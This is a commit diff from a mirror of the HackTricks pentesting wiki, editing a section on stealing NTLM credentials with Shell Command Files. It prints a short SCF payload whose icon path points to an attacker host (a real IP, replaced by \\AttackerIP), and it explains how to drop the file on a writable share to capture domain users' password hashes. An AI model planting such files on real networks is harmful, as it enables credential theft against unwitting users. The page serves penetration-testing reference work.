mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 09:27:32 +00:00
Merge pull request #252 from A1vinSmith/master
Update places-to-steal-ntlm-creds.md
This commit is contained in:
commit
79f06012ed
1 changed files with 2 additions and 2 deletions
|
@ -188,12 +188,12 @@ action=open Setup.exe
|
|||
|
||||
## Shell Command Files
|
||||
|
||||
You can save this as `something.scf` and once you open the folder explorer will try to resolve the network path for the icon.
|
||||
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
|
||||
|
||||
```text
|
||||
[Shell]
|
||||
Command=2
|
||||
IconFile=\\35.164.153.224\test.ico
|
||||
IconFile=\\AttackerIP\ordinary.ico
|
||||
[Taskbar]
|
||||
Command=ToggleDesktop
|
||||
```
|
||||
|
|
Loading…
Reference in a new issue